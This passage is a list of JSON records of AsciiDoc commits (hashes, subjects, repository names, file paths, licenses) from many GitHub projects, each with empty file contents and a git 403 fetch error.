2017-07-31-to-reflect-on-the-cache.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-31-to-reflect-on-the-cache.adoc","new_file":"_posts\/2017-07-31-to-reflect-on-the-cache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d062ecbe5cbb5928891fe800a6047d3ba862a6a","subject":"Update 2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","message":"Update 2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","new_file":"_posts\/2016-02-16-Swift-Google-Analytics-using-Cocoa-Pods.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2be1af92091041f0f343fe52febaa1a4e2236ed","subject":"Started security documentation","message":"Started security documentation\n","repos":"lefou\/blended,woq-blended\/blended,lefou\/blended,woq-blended\/blended","old_file":"doc\/Security.adoc","new_file":"doc\/Security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/blended.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"29dc109069db677e90404df2f9f4024ebf0628b4","subject":"Updates book-using-jison-beyond-the-basics\/4_The_Real_Meat_Advanced_Topics.adoc","message":"Updates book-using-jison-beyond-the-basics\/4_The_Real_Meat_Advanced_Topics.adoc\n\nAuto commit by GitBook Editor","repos":"GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison","old_file":"book-using-jison-beyond-the-basics\/4_The_Real_Meat_Advanced_Topics.adoc","new_file":"book-using-jison-beyond-the-basics\/4_The_Real_Meat_Advanced_Topics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GerHobbelt\/jison.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86110620bb79d6394e7b0ee82bc04b6b83f2f76b","subject":"Update CentOS 6: Install SBT.asciidoc","message":"Update CentOS 6: Install SBT.asciidoc","repos":"lancegatlin\/techblog,lancegatlin\/techblog","old_file":"posts\/CentOS 6: Install SBT.asciidoc","new_file":"posts\/CentOS 6: Install SBT.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lancegatlin\/techblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb7699f16344b6aa2da99af164e15335b659b757","subject":"GithubOrg or GithubUsername can be used for the .\/start.sh script (#32)","message":"GithubOrg or GithubUsername can be used for the .\/start.sh script (#32)\n\n* Update JENKINS.adoc\r\n\r\n* Update JENKINS.adoc\r\n","repos":"wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines","old_file":"docs\/JENKINS.adoc","new_file":"docs\/JENKINS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09538f8508468f7b7b96dfa20df859ba2bf15d55","subject":"job #12502 added implementation note","message":"job #12502 added implementation note\n","repos":"cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12502_clean_x2m.int.adoc","new_file":"doc-bridgepoint\/notes\/12502_clean_x2m.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e08daecc32c1e43af5c473922473ada59c29a8b7","subject":"Update 2015-05-06-Nuovo-Post.adoc","message":"Update 2015-05-06-Nuovo-Post.adoc","repos":"bartoleo\/bartoleo.github.io,bartoleo\/bartoleo.github.io,bartoleo\/bartoleo.github.io","old_file":"_posts\/2015-05-06-Nuovo-Post.adoc","new_file":"_posts\/2015-05-06-Nuovo-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bartoleo\/bartoleo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b15a7ed08322edf760f63b625e3cc7b838a2f1db","subject":"Update 2016-03-04-New-System.adoc","message":"Update 2016-03-04-New-System.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac8749b6110df96af67a833b93671225aafac96d","subject":"Update 2016-03-04-New-System.adoc","message":"Update 2016-03-04-New-System.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-System.adoc","new_file":"_posts\/2016-03-04-New-System.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cc4e0f83cedc45baab98ec05f930793474d843f","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67409e3a5dd7c2bf14ed574f545d38389b207734","subject":"'nother placeholder.","message":"'nother placeholder.\n","repos":"LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava,LearningTree\/TicketManorJava","old_file":"spring-client\/README.adoc","new_file":"spring-client\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTree\/TicketManorJava.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f92d1899b86ab87d3fb73f7b8d0cb3d1b09ccc3","subject":"Create SECURITY.adoc","message":"Create SECURITY.adoc\n\nCloses gh-441.","repos":"mp911de\/spring-vault,mp911de\/spring-vault","old_file":"SECURITY.adoc","new_file":"SECURITY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mp911de\/spring-vault.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0373a0c12adb3ed2a9da26838938c98ea3fd98f2","subject":"Update 2016-12-06-problem-solving-algorithm-intermediate02.adoc","message":"Update 2016-12-06-problem-solving-algorithm-intermediate02.adoc","repos":"qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io","old_file":"_posts\/2016-12-06-problem-solving-algorithm-intermediate02.adoc","new_file":"_posts\/2016-12-06-problem-solving-algorithm-intermediate02.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qeist\/qeist.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7040341c59d5552eda201a88044d54e4a670ca22","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a62744f38e13e811446923bbc2fd18c468a15f45","subject":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","message":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8ed708e4ab5aec66129e0be7ed243c5bfb6599e","subject":"job #11554 added framework of design note","message":"job #11554 added framework of design note\n","repos":"leviathan747\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,perojonsson\/bridgepoint,perojonsson\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,perojonsson\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,perojonsson\/bridgepoint,rmulvey\/bridgepoint,perojonsson\/bridgepoint,lwriemen\/bridgepoint,perojonsson\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11554_relationship_editor\/11554_relationship_editor_dnt.adoc","new_file":"doc-bridgepoint\/notes\/11554_relationship_editor\/11554_relationship_editor_dnt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmulvey\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"abbf73f40841385b38bb5f5f3937a0238872c3fc","subject":"Update 2015-04-19-QRGen-mit-Android-Support-und-SVG-Support.adoc","message":"Update 2015-04-19-QRGen-mit-Android-Support-und-SVG-Support.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2015-04-19-QRGen-mit-Android-Support-und-SVG-Support.adoc","new_file":"_posts\/2015-04-19-QRGen-mit-Android-Support-und-SVG-Support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48b368503a1ac97b9eae290eae742b67397cce09","subject":"Update 2015-07-28-Mi-Primer-articulo.adoc","message":"Update 2015-07-28-Mi-Primer-articulo.adoc","repos":"TommyHernandez\/tommyhernandez.github.io,TommyHernandez\/tommyhernandez.github.io,TommyHernandez\/tommyhernandez.github.io","old_file":"_posts\/2015-07-28-Mi-Primer-articulo.adoc","new_file":"_posts\/2015-07-28-Mi-Primer-articulo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TommyHernandez\/tommyhernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41481b6b351484957f39cb5f401f40300cbed4a5","subject":"filter docs further improved, but still not complete","message":"filter docs further improved, but still not complete\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c5e335a5ec9114c5f6c97cbfb2e2911bdb0cf2e0","subject":"Update 2017-06-01-Naming-Conventions.adoc","message":"Update 2017-06-01-Naming-Conventions.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-06-01-Naming-Conventions.adoc","new_file":"_posts\/2017-06-01-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cff4665857c66c3415adc444763558849b5014e9","subject":"Adding a link to the example how to add +attributes in adoc.","message":"Adding a link to the example how to add +attributes in adoc.\n","repos":"objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,ppalaga\/hawkular.github.io,ppalaga\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,jotak\/hawkular.github.io,ppalaga\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9a3011a40b77c4360082194dada3162f3250d6d","subject":"Added README.adoc","message":"Added README.adoc\n","repos":"asciidoctor\/asciidoctorj-groovy-dsl","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/asciidoctorj-groovy-dsl.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9084df7ebdfc6a9eb2f95b1f31b679297f8fc47f","subject":"Polish","message":"Polish\n","repos":"k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,spring-cloud\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d4a57664843751eee3333cf129b19f1185ba0823","subject":"Added git tutorial 3","message":"Added git tutorial 3","repos":"GYMY-16\/udi-01-TomasZilinek","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GYMY-16\/udi-01-TomasZilinek.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ce489a2e287a4e6335d8c2c329a3e5ba050808e","subject":"Add basic README.adoc with build status","message":"Add basic README.adoc with build status\n","repos":"mkobit\/ratpack-kotlin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkobit\/ratpack-kotlin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"696ba9646b2bf03d6b1b33151784be43dd27504c","subject":"Update 2016-07-04-Answers-to-our-Disney-World-Independence-Day-trivia-questions.adoc","message":"Update 2016-07-04-Answers-to-our-Disney-World-Independence-Day-trivia-questions.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-07-04-Answers-to-our-Disney-World-Independence-Day-trivia-questions.adoc","new_file":"_posts\/2016-07-04-Answers-to-our-Disney-World-Independence-Day-trivia-questions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40c145209ca4afe77cd8ff59ad9a9082b563bb41","subject":"initial draft","message":"initial draft","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/service-assurance\/monitors\/JmxMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/service-assurance\/monitors\/JmxMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aihua\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"adc87024b78a8a8cf82fa03ea3a82da5c2bd4b55","subject":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","message":"Update 2018-11-02-Amazon-Linux-E-C2chrony.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_file":"_posts\/2018-11-02-Amazon-Linux-E-C2chrony.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"847c9948077f660c027c7094a4725183d4f2a0cb","subject":"Update 2015-07-20-Micro-Services-checklist.adoc","message":"Update 2015-07-20-Micro-Services-checklist.adoc","repos":"rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io,rohithkrajan\/rohithkrajan.github.io","old_file":"_posts\/2015-07-20-Micro-Services-checklist.adoc","new_file":"_posts\/2015-07-20-Micro-Services-checklist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rohithkrajan\/rohithkrajan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83be78a13aa2a6e264dae46b3f131e3ba05b7d46","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8976d7b8c996bb42592d861950027bc067dff5f2","subject":"Added a snippet fro project with templates","message":"Added a snippet fro project with templates\n","repos":"korczis\/gooddata-ruby-examples,korczis\/gooddata-ruby-examples","old_file":"06_working_with_projects\/creating_project_from_template.asciidoc","new_file":"06_working_with_projects\/creating_project_from_template.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korczis\/gooddata-ruby-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"530c9e7089aac37b597f37aaee995d31291bf363","subject":"Update 2016-11-05-Saturday-Morning.adoc","message":"Update 2016-11-05-Saturday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Saturday-Morning.adoc","new_file":"_posts\/2016-11-05-Saturday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf96f8a61e80c613a4aec3adc8d16667a4c564ef","subject":"Update 2018-03-06-Creating-a-custom-select-element.adoc","message":"Update 2018-03-06-Creating-a-custom-select-element.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16fc63084ae489a47c874ce97f39760e390c0da3","subject":"gogo initial","message":"gogo initial\n","repos":"rotty3000\/papersntalks,rotty3000\/papersntalks,rotty3000\/papersntalks","old_file":"2014\/gogo\/gogo-telnet.adoc","new_file":"2014\/gogo\/gogo-telnet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rotty3000\/papersntalks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"990b15682e81f84ee89ab75c23d36a71ea00f114","subject":"Update 2018-12-01-Programmers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc","message":"Update 2018-12-01-Programmers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-12-01-Programmers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc","new_file":"_posts\/2018-12-01-Programmers-Guide-to-Working-in-Open-Floor-Plan-Offices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5280e85d2a9112559ea54fa5e75b744b26efca84","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13b11345b59b37e889a2d163fd46fabb019aa913","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2eaabaff256b6dd7c948fe7939456c62888ef8ad","subject":"Announcing Debezium UI PoC","message":"Announcing Debezium UI PoC\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-10-22-towards-debzium-ui.adoc","new_file":"blog\/2020-10-22-towards-debzium-ui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c071c7a00197e8d3d1d1956b2c2dda63ae37bc9","subject":"Port forward to Grafana dashboard works in any case","message":"Port forward to Grafana dashboard works in any case\n","repos":"scholzj\/barnabas,scholzj\/barnabas,ppatierno\/kaas,ppatierno\/kaas","old_file":"documentation\/adoc\/appendix_metrics.adoc","new_file":"documentation\/adoc\/appendix_metrics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scholzj\/barnabas.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d1865e1fda8a69fc93ef8dfae56917fd222946a","subject":"Update 2017-04-24-Mon-premier-post-a-propos-de-ma-reconversion-a-la-patisserie.adoc","message":"Update 2017-04-24-Mon-premier-post-a-propos-de-ma-reconversion-a-la-patisserie.adoc","repos":"lrabiet\/patisserie,lrabiet\/patisserie,lrabiet\/patisserie,lrabiet\/patisserie","old_file":"_posts\/2017-04-24-Mon-premier-post-a-propos-de-ma-reconversion-a-la-patisserie.adoc","new_file":"_posts\/2017-04-24-Mon-premier-post-a-propos-de-ma-reconversion-a-la-patisserie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lrabiet\/patisserie.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 